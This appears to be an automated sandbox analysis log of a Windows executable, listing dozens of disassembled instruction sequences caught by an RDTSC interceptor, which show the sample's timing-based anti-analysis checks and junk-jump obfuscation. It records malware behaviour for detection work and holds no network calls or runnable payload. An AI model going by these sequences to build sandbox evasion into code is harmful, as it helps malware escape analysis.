Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545001F second address: 54500C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F4688C929E6h 0x00000011 push eax 0x00000012 jmp 00007F4688C929DBh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4688C929E4h 0x0000001f xor ch, FFFFFFF8h 0x00000022 jmp 00007F4688C929DBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F4688C929E8h 0x0000002e adc cl, 00000058h 0x00000031 jmp 00007F4688C929DBh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d call 00007F4688C929E2h 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430E3F second address: 5430E94 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov cx, F4DDh 0x0000000d pushfd 0x0000000e jmp 00007F4688C1B76Ah 0x00000013 add eax, 6966C738h 0x00000019 jmp 00007F4688C1B76Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F4688C1B779h 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4688C1B76Dh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430E94 second address: 5430EC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4688C929DEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430EC0 second address: 5430EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430EC4 second address: 5430ECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470F4E second address: 5470F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4688C1B777h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5410144 second address: 5410185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 24B112F2h 0x00000008 mov dh, 6Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f movzx esi, dx 0x00000012 mov bl, 48h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4688C929E2h 0x0000001e xor ax, 4138h 0x00000023 jmp 00007F4688C929DBh 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b movzx eax, bx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C3F second address: 5430C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C45 second address: 5430C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C49 second address: 5430C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4688C1B76Eh 0x00000010 sub si, 1D28h 0x00000015 jmp 00007F4688C1B76Bh 0x0000001a popfd 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C7B second address: 5430C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C7F second address: 5430C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C83 second address: 5430C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C89 second address: 5430C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430C9C second address: 5430CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4688C929E5h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F4688C929DEh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430CD1 second address: 5430CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 543087A second address: 54308BE instructions: 0x00000000 rdtsc 0x00000002 mov ch, C0h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4688C929E5h 0x0000000c and ax, 9836h 0x00000011 jmp 00007F4688C929E1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4688C929DDh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430776 second address: 543078B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430569 second address: 54305BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f mov dx, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4688C929E5h 0x0000001e xor ecx, 31D1AE16h 0x00000024 jmp 00007F4688C929E1h 0x00000029 popfd 0x0000002a mov cx, 0087h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54305BA second address: 54305C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54305C0 second address: 54305C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54305C4 second address: 54305D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54305D2 second address: 54305DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 08A85249h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440188 second address: 54401BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F4688C1B76Bh 0x0000000b sub ah, FFFFFFCEh 0x0000000e jmp 00007F4688C1B779h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54401BF second address: 54401C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, AAh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54401C6 second address: 544023C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C1B771h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4688C1B771h 0x0000000f adc cx, 0D66h 0x00000014 jmp 00007F4688C1B771h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edi 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F4688C1B76Fh 0x0000002a sbb al, FFFFFF9Eh 0x0000002d jmp 00007F4688C1B779h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470E4B second address: 5470E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F4688C929E6h 0x00000011 add cx, 5F78h 0x00000016 jmp 00007F4688C929DBh 0x0000001b popfd 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470E8C second address: 5470E9B instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470E9B second address: 5470EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470EA1 second address: 5470EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470EA7 second address: 5470EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470EAB second address: 5470EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545037F second address: 5450457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4688C929E7h 0x00000009 jmp 00007F4688C929E3h 0x0000000e popfd 0x0000000f mov bx, cx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 movzx esi, dx 0x0000001a pushfd 0x0000001b jmp 00007F4688C929DDh 0x00000020 sub esi, 5CA0D0C6h 0x00000026 jmp 00007F4688C929E1h 0x0000002b popfd 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f call 00007F4688C929E7h 0x00000034 mov ecx, 79290B5Fh 0x00000039 pop esi 0x0000003a popad 0x0000003b xchg eax, ebp 0x0000003c jmp 00007F4688C929DEh 0x00000041 mov ebp, esp 0x00000043 jmp 00007F4688C929E0h 0x00000048 mov eax, dword ptr [ebp+08h] 0x0000004b jmp 00007F4688C929E0h 0x00000050 and dword ptr [eax], 00000000h 0x00000053 jmp 00007F4688C929E0h 0x00000058 and dword ptr [eax+04h], 00000000h 0x0000005c pushad 0x0000005d mov ebx, eax 0x0000005f mov ch, 4Eh 0x00000061 popad 0x00000062 pop ebp 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5450457 second address: 545045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545045B second address: 5450490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F4688C929E8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54306D6 second address: 54306DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54306DC second address: 54306E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54306E0 second address: 5430710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F4688C1B76Bh 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5430710 second address: 5430716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440E68 second address: 5440F12 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4688C1B779h 0x00000008 adc cx, 3CD6h 0x0000000d jmp 00007F4688C1B771h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov di, cx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b jmp 00007F4688C1B778h 0x00000020 push eax 0x00000021 pushfd 0x00000022 jmp 00007F4688C1B771h 0x00000027 adc ah, FFFFFF96h 0x0000002a jmp 00007F4688C1B771h 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007F4688C1B76Ch 0x00000039 movzx ecx, bx 0x0000003c popad 0x0000003d xchg eax, ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F4688C1B778h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5440F12 second address: 5440F3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C929E5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545020B second address: 545021C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 545021C second address: 5450251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov cx, 1F63h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4688C929E1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470661 second address: 5470670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470670 second address: 5470676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470676 second address: 547068A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop ebx 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 547068A second address: 5470722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C929DCh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F4688C929DBh 0x0000000f or esi, 7222CF9Eh 0x00000015 jmp 00007F4688C929E9h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 jmp 00007F4688C929DEh 0x00000025 xchg eax, ecx 0x00000026 jmp 00007F4688C929E0h 0x0000002b push eax 0x0000002c pushad 0x0000002d push edx 0x0000002e movzx esi, di 0x00000031 pop edi 0x00000032 push ecx 0x00000033 movsx edi, si 0x00000036 pop esi 0x00000037 popad 0x00000038 xchg eax, ecx 0x00000039 jmp 00007F4688C929DDh 0x0000003e mov eax, dword ptr [76FB65FCh] 0x00000043 pushad 0x00000044 mov cl, 02h 0x00000046 mov ecx, ebx 0x00000048 popad 0x00000049 test eax, eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F4688C929DEh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470722 second address: 5470734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B76Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470734 second address: 5470738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470738 second address: 5470776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F46FA6DE98Ch 0x0000000e jmp 00007F4688C1B777h 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4688C1B775h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470776 second address: 54707E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F4688C929E8h 0x00000015 adc ax, 87D8h 0x0000001a jmp 00007F4688C929DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F4688C929E8h 0x00000026 sbb al, 00000038h 0x00000029 jmp 00007F4688C929DBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54707E4 second address: 5470813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B76Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470813 second address: 5470867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ror eax, cl 0x0000000c jmp 00007F4688C929E5h 0x00000011 leave 0x00000012 jmp 00007F4688C929DEh 0x00000017 retn 0004h 0x0000001a nop 0x0000001b mov esi, eax 0x0000001d lea eax, dword ptr [ebp-08h] 0x00000020 xor esi, dword ptr [001C2014h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 lea eax, dword ptr [ebp-10h] 0x0000002c push eax 0x0000002d call 00007F468DF8324Ch 0x00000032 push FFFFFFFEh 0x00000034 pushad 0x00000035 jmp 00007F4688C929DDh 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4688C929DDh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470867 second address: 5470890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4688C1B777h 0x00000008 pop esi 0x00000009 mov dh, 73h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ret 0x0000000f nop 0x00000010 push eax 0x00000011 call 00007F468DF0C017h 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470890 second address: 5470894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470894 second address: 5470898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470898 second address: 547089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 547089E second address: 54708B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C1B76Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54708B8 second address: 54708E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54708E7 second address: 54708ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54708ED second address: 54708F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54708F1 second address: 5470920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4688C1B770h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470920 second address: 5470924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 5470924 second address: 547092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 547092A second address: 547094B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 547094B second address: 547095A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54201A8 second address: 54201C1 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54201C1 second address: 54201D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov al, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, ebx 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54201D7 second address: 54201DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 54201DD second address: 542020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4688C1B775h 0x00000015 rdtsc
